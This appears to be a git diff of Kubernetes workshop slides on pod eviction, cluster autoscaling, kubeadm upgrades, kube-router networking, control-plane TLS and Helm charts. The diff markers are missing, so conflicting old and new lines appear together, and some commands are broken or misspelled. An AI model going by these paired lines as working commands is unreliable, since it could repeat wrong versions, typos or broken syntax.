|
||||
|
||||
---
|
||||
|
||||
## What happens to evicted pods?
|
||||
|
||||
- The pod is terminated
|
||||
|
||||
- It is marked as `Failed` at the API level
|
||||
|
||||
- If the pod was created by a controller, the controller will recreate it
|
||||
|
||||
- The pod will be recreated on another node, *if there are resources available!*
|
||||
|
||||
- For more details about the eviction process, see:
|
||||
|
||||
- [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
|
||||
|
||||
- [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
|
||||
|
||||
---
|
||||
|
||||
## What if there are no resources available?
|
||||
|
||||
- Sometimes, a pod cannot be scheduled anywhere:
|
||||
|
||||
- all the nodes are under pressure,
|
||||
|
||||
- or the pod requests more resources than are available
|
||||
|
||||
- The pod then remains in `Pending` state until the situation improves
|
||||
|
||||
---
|
||||
|
||||
## Cluster scaling
|
||||
|
||||
- One way to improve the situation is to add new nodes
|
||||
|
||||
- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
|
||||
|
||||
- The autoscaler will automatically scale up:
|
||||
|
||||
- if there are pods that failed to be scheduled
|
||||
|
||||
- The autoscaler will automatically scale down:
|
||||
|
||||
- if nodes have a low utilization for an extended period of time
|
||||
|
||||
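- On self-managed clusters, the autoscaler deployment typically receives its node group boundaries through flags like these (provider and group name are placeholders):
  ```bash
  cluster-autoscaler \
    --cloud-provider=aws \
    --nodes=1:10:my-node-group \
    --scale-down-utilization-threshold=0.5
  ```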
---
|
||||
|
||||
## Restrictions, gotchas ...
|
||||
|
||||
- The Cluster Autoscaler only supports a few cloud infrastructures
|
||||
|
||||
  (see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list; [in preview for AKS](https://docs.microsoft.com/en-us/azure/aks/cluster-autoscaler))
|
||||
|
||||
- The Cluster Autoscaler cannot scale down nodes that have pods using:
|
||||
|
||||
- local storage
|
||||
|
||||
- affinity/anti-affinity rules preventing them from being rescheduled
|
||||
|
||||
- a restrictive PodDisruptionBudget
|
||||
|
||||
---
|
||||
|
||||
## Other ways to do capacity planning
|
||||
|
||||
- "Running Kubernetes without nodes"
|
||||
|
||||
- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
|
||||
|
||||
- Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
|
||||
|
||||
- Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
|
||||
|
||||
- Economic advantage (no wasted capacity)
|
||||
|
||||
- Security advantage (stronger isolation between pods)
|
||||
|
||||
Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.2-00
|
||||
apt install kubelet=1.14.1-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh test$N sudo apt install kubelet=1.14.2-00
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@
|
||||
|
||||
The reference plugins are available [here].
|
||||
|
||||
Look in each plugin's directory for its documentation.
|
||||
Look into each plugin's directory for its documentation.
|
||||
|
||||
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
|
||||
|
||||
@@ -66,8 +66,6 @@ Look in each plugin's directory for its documentation.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Conf vs conflist
|
||||
|
||||
- There are two slightly different configuration formats
|
||||
@@ -100,7 +98,7 @@ class: extra-details
|
||||
|
||||
- CNI_NETNS: path to network namespace file
|
||||
|
||||
- CNI_IFNAME: what the network interface should be named
|
||||
- CNI_IFNAME: how the network interface should be named
|
||||
|
||||
- The network configuration must be provided to the plugin on stdin
|
||||
|
||||
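- Putting the environment variables and the stdin convention together, a manual invocation could look like this (paths and identifiers are illustrative):
  ```bash
  CNI_COMMAND=ADD CNI_CONTAINERID=cid123 CNI_NETNS=/var/run/netns/test \
  CNI_IFNAME=eth0 CNI_PATH=/opt/cni/bin \
  /opt/cni/bin/bridge < /etc/cni/net.d/10-mynet.conf
  ```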
@@ -190,16 +188,12 @@ class: extra-details
|
||||
|
||||
- ... But this time, the controller manager will allocate `podCIDR` subnets
|
||||
|
||||
(so that we don't have to manually assign subnets to individual nodes)
|
||||
- We will start kube-router with a DaemonSet
|
||||
|
||||
- We will create a DaemonSet for kube-router
|
||||
|
||||
- We will join nodes to the cluster
|
||||
|
||||
- The DaemonSet will automatically start a kube-router pod on each node
|
||||
- This DaemonSet will start one instance of kube-router on each node
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Logging into the new cluster
|
||||
|
||||
.exercise[
|
||||
@@ -227,7 +221,7 @@ class: extra-details
|
||||
- It is similar to the one we used with the `kubenet` cluster
|
||||
|
||||
- The API server is started with `--allow-privileged`
|
||||
|
||||
|
||||
(because we will start kube-router in privileged pods)
|
||||
|
||||
- The controller manager is started with extra flags too:
|
||||
@@ -260,7 +254,7 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## The kube-router DaemonSet
|
||||
## The kube-router DaemonSet
|
||||
|
||||
- In the same directory, there is a `kuberouter.yaml` file
|
||||
|
||||
@@ -278,7 +272,7 @@ class: extra-details
|
||||
|
||||
- The address of the API server will be `http://A.B.C.D:8080`
|
||||
|
||||
(where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
|
||||
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -306,10 +300,12 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
|
||||
|
||||
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
|
||||
```bash
|
||||
kubectl config set-cluster cni --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context cni --cluster cni
|
||||
kubectl config use-context cni
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
```
|
||||
|
||||
]
|
||||
@@ -455,7 +451,7 @@ We should see the local pod CIDR connected to `kube-bridge`, and the other nodes
|
||||
|
||||
- Or try to exec into one of the kube-router pods:
|
||||
```bash
|
||||
kubectl -n kube-system exec kube-router-xxxxx bash
|
||||
kubectl -n kube-system exec kuber-router-xxxxx bash
|
||||
```
|
||||
|
||||
]
|
||||
@@ -491,8 +487,8 @@ What does that mean?
|
||||
|
||||
- First, get the container ID, with `docker ps` or like this:
|
||||
```bash
|
||||
CID=$(docker ps -q \
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system \
|
||||
CID=$(docker ps
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system
|
||||
--filter label=io.kubernetes.container.name=kube-router)
|
||||
```
|
||||
|
||||
@@ -577,7 +573,7 @@ done
|
||||
|
||||
## Starting the route reflector
|
||||
|
||||
- Only do this slide if you are doing this on your own
|
||||
- Only do this if you are doing this on your own
|
||||
|
||||
- There is a Compose file in the `compose/frr-route-reflector` directory
|
||||
|
||||
@@ -603,13 +599,13 @@ done
|
||||
|
||||
## Updating kube-router configuration
|
||||
|
||||
- We need to pass two command-line flags to the kube-router process
|
||||
- We need to add two command-line flags to the kube-router process
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the `kuberouter.yaml` file
|
||||
|
||||
- Add the following flags to the kube-router arguments:
|
||||
- Add the following flags to the kube-router arguments,:
|
||||
```
|
||||
- "--peer-router-ips=`X.X.X.X`"
|
||||
- "--peer-router-asns=64512"
|
||||
|
||||
@@ -177,7 +177,7 @@ class: extra-details
|
||||
|
||||
- In that case, there is no "master node"
|
||||
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master."*
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master".*
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- There are many ways to pass configuration to code running in a container:
|
||||
|
||||
- baking it into a custom image
|
||||
- baking it in a custom image
|
||||
|
||||
- command-line arguments
|
||||
|
||||
@@ -125,7 +125,7 @@
|
||||
|
||||
- We can also use a mechanism called the *downward API*
|
||||
|
||||
- The downward API allows exposing pod or container information
|
||||
- The downward API allows to expose pod or container information
|
||||
|
||||
- either through special files (we won't show that for now)
|
||||
|
||||
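- A minimal sketch of the downward API used through environment variables (the field shown is just one example):
  ```yaml
  env:
  - name: MY_NODE_NAME
    valueFrom:
      fieldRef:
        fieldPath: spec.nodeName
  ```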
@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.
|
||||
|
||||
- We are going to store the port number in a configmap
|
||||
|
||||
- Then we will expose that configmap as a container environment variable
|
||||
- Then we will expose that configmap to a container environment variable
|
||||
|
||||
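- The general shape of that pattern looks like this (configmap and key names below are placeholders; the exercise uses its own):
  ```bash
  kubectl create configmap app-config --from-literal=http.port=8888
  ```
  ```yaml
  env:
  - name: HTTP_PORT
    valueFrom:
      configMapKeyRef:
        name: app-config
        key: http.port
  ```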
---
|
||||
|
||||
|
||||
@@ -1,265 +0,0 @@
|
||||
# Securing the control plane
|
||||
|
||||
- Many components accept connections (and requests) from others:
|
||||
|
||||
- API server
|
||||
|
||||
- etcd
|
||||
|
||||
- kubelet
|
||||
|
||||
- We must secure these connections:
|
||||
|
||||
- to deny unauthorized requests
|
||||
|
||||
  - to prevent eavesdropping on secrets, tokens, and other sensitive information
|
||||
|
||||
- Disabling authentication and/or authorization is **strongly discouraged**
|
||||
|
||||
(but it's possible to do it, e.g. for learning / troubleshooting purposes)
|
||||
|
||||
---
|
||||
|
||||
## Authentication and authorization
|
||||
|
||||
- Authentication (checking "who you are") is done with mutual TLS
|
||||
|
||||
(both the client and the server need to hold a valid certificate)
|
||||
|
||||
- Authorization (checking "what you can do") is done in different ways
|
||||
|
||||
- the API server implements a sophisticated permission logic (with RBAC)
|
||||
|
||||
- some services will defer authorization to the API server (through webhooks)
|
||||
|
||||
- some services require a certificate signed by a particular CA / sub-CA
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- We will review the various communication channels in the control plane
|
||||
|
||||
- We will describe how they are secured
|
||||
|
||||
- When TLS certificates are used, we will indicate:
|
||||
|
||||
- which CA signs them
|
||||
|
||||
- what their subject (CN) should be, when applicable
|
||||
|
||||
- We will indicate how to configure security (client- and server-side)
|
||||
|
||||
---
|
||||
|
||||
## etcd peers
|
||||
|
||||
- Replication and coordination of etcd happens on a dedicated port
|
||||
|
||||
(typically port 2380; the default port for normal client connections is 2379)
|
||||
|
||||
- Authentication uses TLS certificates with a separate sub-CA
|
||||
|
||||
(otherwise, anyone with a Kubernetes client certificate could access etcd!)
|
||||
|
||||
- The etcd command line flags involved are:
|
||||
|
||||
`--peer-client-cert-auth=true` to activate it
|
||||
|
||||
`--peer-cert-file`, `--peer-key-file`, `--peer-trusted-ca-file`
|
||||
|
||||
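- On a kubeadm-style setup, the relevant part of the etcd command line could look like this (certificate paths vary between distributions):
  ```bash
  etcd \
    --listen-peer-urls=https://10.0.0.11:2380 \
    --peer-client-cert-auth=true \
    --peer-cert-file=/etc/kubernetes/pki/etcd/peer.crt \
    --peer-key-file=/etc/kubernetes/pki/etcd/peer.key \
    --peer-trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
  ```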
---
|
||||
|
||||
## etcd clients
|
||||
|
||||
- The only¹ thing that connects to etcd is the API server
|
||||
|
||||
- Authentication uses TLS certificates with a separate sub-CA
|
||||
|
||||
(for the same reasons as for etcd inter-peer authentication)
|
||||
|
||||
- The etcd command line flags involved are:
|
||||
|
||||
`--client-cert-auth=true` to activate it
|
||||
|
||||
`--trusted-ca-file`, `--cert-file`, `--key-file`
|
||||
|
||||
- The API server command line flags involved are:
|
||||
|
||||
`--etcd-cafile`, `--etcd-certfile`, `--etcd-keyfile`
|
||||
|
||||
.footnote[¹Technically, there is also the etcd healthcheck. Let's ignore it for now.]
|
||||
|
||||
---
|
||||
|
||||
## API server clients
|
||||
|
||||
- The API server has a sophisticated authentication and authorization system
|
||||
|
||||
- For connections coming from other components of the control plane:
|
||||
|
||||
- authentication uses certificates (trusting the certificates' subject or CN)
|
||||
|
||||
- authorization uses whatever mechanism is enabled (most oftentimes, RBAC)
|
||||
|
||||
- The relevant API server flags are:
|
||||
|
||||
`--client-ca-file`, `--tls-cert-file`, `--tls-private-key-file`
|
||||
|
||||
- Each component connecting to the API server takes a `--kubeconfig` flag
|
||||
|
||||
(to specify a kubeconfig file containing the CA cert, client key, and client cert)
|
||||
|
||||
- Yes, that kubeconfig file follows the same format as our `~/.kube/config` file!
|
||||
|
||||
---
|
||||
|
||||
## Kubelet and API server
|
||||
|
||||
- Communication between kubelet and API server can be established both ways
|
||||
|
||||
- Kubelet → API server:
|
||||
|
||||
- kubelet registers itself ("hi, I'm node42, do you have work for me?")
|
||||
|
||||
- connection is kept open and re-established if it breaks
|
||||
|
||||
- that's how the kubelet knows which pods to start/stop
|
||||
|
||||
- API server → kubelet:
|
||||
|
||||
- used to retrieve logs, exec, attach to containers
|
||||
|
||||
---
|
||||
|
||||
## Kubelet → API server
|
||||
|
||||
- Kubelet is started with `--kubeconfig` with API server information
|
||||
|
||||
- The client certificate of the kubelet will typically have:
|
||||
|
||||
`CN=system:node:<nodename>` and groups `O=system:nodes`
|
||||
|
||||
- Nothing special on the API server side
|
||||
|
||||
(it will authenticate like any other client)
|
||||
|
||||
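- On a kubeadm cluster, one way to check this is to look at the subject of the kubelet's client certificate (the path may differ on other setups):
  ```bash
  sudo openssl x509 -noout -subject \
       -in /var/lib/kubelet/pki/kubelet-client-current.pem
  ```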
---
|
||||
|
||||
## API server → kubelet
|
||||
|
||||
- Kubelet is started with the flag `--client-ca-file`
|
||||
|
||||
(typically using the same CA as the API server)
|
||||
|
||||
- API server will use a dedicated key pair when contacting kubelet
|
||||
|
||||
(specified with `--kubelet-client-certificate` and `--kubelet-client-key`)
|
||||
|
||||
- Authorization uses webhooks
|
||||
|
||||
(enabled with `--authorization-mode=Webhook` on kubelet)
|
||||
|
||||
- The webhook server is the API server itself
|
||||
|
||||
(the kubelet sends back a request to the API server to ask, "can this person do that?")
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- The scheduler connects to the API server like an ordinary client
|
||||
|
||||
- The certificate of the scheduler will have `CN=system:kube-scheduler`
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- The controller manager is also a normal client to the API server
|
||||
|
||||
- Its certificate will have `CN=system:kube-controller-manager`
|
||||
|
||||
- If we use the CSR API, the controller manager needs the CA cert and key
|
||||
|
||||
(passed with flags `--cluster-signing-cert-file` and `--cluster-signing-key-file`)
|
||||
|
||||
- We usually want the controller manager to generate tokens for service accounts
|
||||
|
||||
- These tokens deserve some details (on the next slide!)
|
||||
|
||||
---
|
||||
|
||||
## Service account tokens
|
||||
|
||||
- Each time we create a service account, the controller manager generates a token
|
||||
|
||||
- These tokens are JWT tokens, signed with a particular key
|
||||
|
||||
- These tokens are used for authentication with the API server
|
||||
|
||||
(and therefore, the API server needs to be able to verify their integrity)
|
||||
|
||||
- This uses another keypair:
|
||||
|
||||
- the private key (used for signature) is passed to the controller manager
|
||||
<br/>(using flags `--service-account-private-key-file` and `--root-ca-file`)
|
||||
|
||||
- the public key (used for verification) is passed to the API server
|
||||
<br/>(using flag `--service-account-key-file`)
|
||||
|
||||
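- Since these are JWTs, their payload can be decoded; a rough sketch from inside a pod (assuming `jq` is available; `base64` may complain about padding):
  ```bash
  TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
  echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq .
  ```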
---
|
||||
|
||||
## kube-proxy
|
||||
|
||||
- kube-proxy is "yet another API server client"
|
||||
|
||||
- In many clusters, it runs as a Daemon Set
|
||||
|
||||
- In that case, it will have its own Service Account and associated permissions
|
||||
|
||||
- It will authenticate using the token of that Service Account
|
||||
|
||||
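- On clusters following that pattern, this can be verified with something like (resource names may differ):
  ```bash
  kubectl -n kube-system get daemonset kube-proxy \
          -o jsonpath="{.spec.template.spec.serviceAccountName}"
  ```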
---
|
||||
|
||||
## Webhooks
|
||||
|
||||
- We mentioned webhooks earlier; how does that really work?
|
||||
|
||||
- The Kubernetes API has special resource types to check permissions
|
||||
|
||||
- One of them is SubjectAccessReview
|
||||
|
||||
- To check if a particular user can do a particular action on a particular resource:
|
||||
|
||||
- we prepare a SubjectAccessReview object
|
||||
|
||||
- we send that object to the API server
|
||||
|
||||
- the API server responds with allow/deny (and optional explanations)
|
||||
|
||||
- Using webhooks for authorization = sending SAR to authorize each request
|
||||
|
||||
---
|
||||
|
||||
## Subject Access Review
|
||||
|
||||
Here is an example showing how to check if `jean.doe` can `get` some `pods` in `kube-system`:
|
||||
|
||||
```bash
|
||||
kubectl -v9 create -f- <<EOF
|
||||
apiVersion: authorization.k8s.io/v1beta1
|
||||
kind: SubjectAccessReview
|
||||
spec:
|
||||
user: jean.doe
|
||||
group:
|
||||
- foo
|
||||
- bar
|
||||
resourceAttributes:
|
||||
#group: blah.k8s.io
|
||||
namespace: kube-system
|
||||
resource: pods
|
||||
verb: get
|
||||
#name: web-xyz1234567-pqr89
|
||||
EOF
|
||||
```
|
||||
@@ -1,114 +0,0 @@
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
@@ -1,367 +0,0 @@
|
||||
# Creating Helm charts
|
||||
|
||||
- We are going to create a generic Helm chart
|
||||
|
||||
- We will use that Helm chart to deploy DockerCoins
|
||||
|
||||
- Each component of DockerCoins will have its own *release*
|
||||
|
||||
- In other words, we will "install" that Helm chart multiple times
|
||||
|
||||
(one time per component of DockerCoins)
|
||||
|
||||
---
|
||||
|
||||
## Creating a generic chart
|
||||
|
||||
- Rather than starting from scratch, we will use `helm create`
|
||||
|
||||
- This will give us a basic chart that we will customize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a basic chart:
|
||||
```bash
|
||||
cd ~
|
||||
helm create helmcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This creates a basic chart in the directory `helmcoins`.
|
||||
|
||||
---
|
||||
|
||||
## What's in the basic chart?
|
||||
|
||||
- The basic chart will create a Deployment and a Service
|
||||
|
||||
- Optionally, it will also include an Ingress
|
||||
|
||||
- If we don't pass any values, it will deploy the `nginx` image
|
||||
|
||||
- We can override many things in that chart
|
||||
|
||||
- Let's try to deploy DockerCoins components with that chart!
|
||||
|
||||
---
|
||||
|
||||
## Writing `values.yaml` for our components
|
||||
|
||||
- We need to write one `values.yaml` file for each component
|
||||
|
||||
(hasher, redis, rng, webui, worker)
|
||||
|
||||
- We will start with the `values.yaml` of the chart, and remove what we don't need
|
||||
|
||||
- We will create 5 files:
|
||||
|
||||
hasher.yaml, redis.yaml, rng.yaml, webui.yaml, worker.yaml
|
||||
|
||||
---
|
||||
|
||||
## Getting started
|
||||
|
||||
- For component X, we want to use the image dockercoins/X:v0.1
|
||||
|
||||
(for instance, for rng, we want to use the image dockercoins/rng:v0.1)
|
||||
|
||||
- Exception: for redis, we want to use the official image redis:latest
|
||||
|
||||
.exercise[
|
||||
|
||||
- Write minimal YAML files for the 5 components, specifying only the image
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*Hint: our YAML files should look like this.*
|
||||
|
||||
```yaml
|
||||
### rng.yaml
|
||||
image:
|
||||
repository: dockercoins/`rng`
|
||||
tag: v0.1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying DockerCoins components
|
||||
|
||||
- For convenience, let's work in a separate namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace helmcoins
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns helmcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the chart
|
||||
|
||||
- To install a chart, we can use the following command:
|
||||
```bash
|
||||
helm install [--name `X`] <chart>
|
||||
```
|
||||
|
||||
- We can also use the following command, which is idempotent:
|
||||
```bash
|
||||
helm upgrade --install `X` chart
|
||||
```
|
||||
|
||||
.exercise[
|
||||
|
||||
- Install the 5 components of DockerCoins:
|
||||
```bash
|
||||
for COMPONENT in hasher redis rng webui worker; do
|
||||
helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- Let's see if DockerCoins is working!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of the worker:
|
||||
```bash
|
||||
stern worker
|
||||
```
|
||||
|
||||
- Look at the resources that were created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
There are *many* issues to fix!
|
||||
|
||||
---
|
||||
|
||||
## Service names
|
||||
|
||||
- Our services should be named `rng`, `hasher`, etc., but they are named differently
|
||||
|
||||
- Look at the YAML template used for the services
|
||||
|
||||
- Does it look like we can override the name of the services?
|
||||
|
||||
--
|
||||
|
||||
- *Yes*, we can use `.Values.nameOverride`
|
||||
|
||||
- This means setting `nameOverride` in the values YAML file
|
||||
|
||||
---
|
||||
|
||||
## Setting service names
|
||||
|
||||
- Let's add `nameOverride: X` in each values YAML file!
|
||||
|
||||
(where X is hasher, redis, rng, etc.)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the 5 YAML files to add `nameOverride: X`
|
||||
|
||||
- Deploy the updated Chart:
|
||||
```bash
|
||||
for COMPONENT in hasher redis rng webui worker; do
|
||||
helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
|
||||
done
|
||||
```
|
||||
(Yes, this is exactly the same command as before!)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the service names:
|
||||
```bash
|
||||
kubectl get services
|
||||
```
|
||||
Great! (We have a useless service for `worker`, but let's ignore it for now.)
|
||||
|
||||
- Check the state of the pods:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
Not so great... Some pods are *not ready.*
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting pods
|
||||
|
||||
- The easiest way to troubleshoot pods is to look at *events*
|
||||
|
||||
- We can look at all the events on the cluster (with `kubectl get events`)
|
||||
|
||||
- Or we can use `kubectl describe` on the objects that have problems
|
||||
|
||||
(`kubectl describe` will retrieve the events related to the object)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the events for the redis pods:
|
||||
```bash
|
||||
kubectl describe pod -l app.kubernetes.io/name=redis
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
What's going on?
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks
|
||||
|
||||
- The default chart defines healthchecks doing HTTP requests on port 80
|
||||
|
||||
- That won't work for redis and worker
|
||||
|
||||
(redis is not HTTP, and not on port 80; worker doesn't even listen)
|
||||
|
||||
--
|
||||
|
||||
- We could comment out the healthchecks
|
||||
|
||||
- We could also make them conditional
|
||||
|
||||
- This sounds more interesting, let's do that!
|
||||
|
||||
---
|
||||
|
||||
## Conditionals
|
||||
|
||||
- We need to enclose the healthcheck block with:
|
||||
|
||||
`{{ if CONDITION }}` at the beginning
|
||||
|
||||
`{{ end }}` at the end
|
||||
|
||||
- For the condition, we will use `.Values.healthcheck`
|
||||
|
||||
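- The resulting section of the template would look roughly like this (probe details depend on what `helm create` generated):
  ```yaml
  {{ if .Values.healthcheck }}
  livenessProbe:
    httpGet:
      path: /
      port: http
  readinessProbe:
    httpGet:
      path: /
      port: http
  {{ end }}
  ```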
---
|
||||
|
||||
## Updating the deployment template
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `helmcoins/templates/deployment.yaml`
|
||||
|
||||
- Before the healthchecks section (it starts with `livenessProbe:`), add:
|
||||
|
||||
`{{ if .Values.healthcheck }}`
|
||||
|
||||
- After the healthchecks section (just before `resources:`), add:
|
||||
|
||||
`{{ end }}`
|
||||
|
||||
- Edit `hasher.yaml`, `rng.yaml`, `webui.yaml` to add:
|
||||
|
||||
`healthcheck: true`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Update the deployed charts
|
||||
|
||||
- We can now apply the new templates (and the new values)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Use the same command as earlier to upgrade all five components
|
||||
|
||||
- Use `kubectl describe` to confirm that `redis` starts correctly
|
||||
|
||||
- Use `kubectl describe` to confirm that `hasher` still has healthchecks
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is it working now?
|
||||
|
||||
- If we look at the worker logs, it appears that the worker is still stuck
|
||||
|
||||
- What could be happening?
|
||||
|
||||
--
|
||||
|
||||
- The redis service is not on port 80!
|
||||
|
||||
- We need to update the port number in redis.yaml
|
||||
|
||||
- We also need to update the port number in deployment.yaml
|
||||
|
||||
(it is hard-coded to 80 there)
|
||||
|
||||
---
|
||||
|
||||
## Setting the redis port
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `redis.yaml` to add:
|
||||
```yaml
|
||||
service:
|
||||
port: 6379
|
||||
```
|
||||
|
||||
- Edit `helmcoins/templates/deployment.yaml`
|
||||
|
||||
- The line with `containerPort` should be:
|
||||
```yaml
|
||||
containerPort: {{ .Values.service.port }}
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Apply changes
|
||||
|
||||
- Re-run the for loop to execute `helm upgrade` one more time
|
||||
|
||||
- Check the worker logs
|
||||
|
||||
- This time, it should be working!
|
||||
|
||||
---
|
||||
|
||||
## Extra steps
|
||||
|
||||
- We don't need to create a service for the worker
|
||||
|
||||
- We can put the whole service block in a conditional
|
||||
|
||||
(this will require additional changes in other files referencing the service)
|
||||
|
||||
- We can set the webui to be a NodePort service
|
||||
|
||||
- We can change the number of workers with `replicaCount`
|
||||
|
||||
- And much more!
|
||||
@@ -1,426 +0,0 @@
|
||||
# The CSR API
|
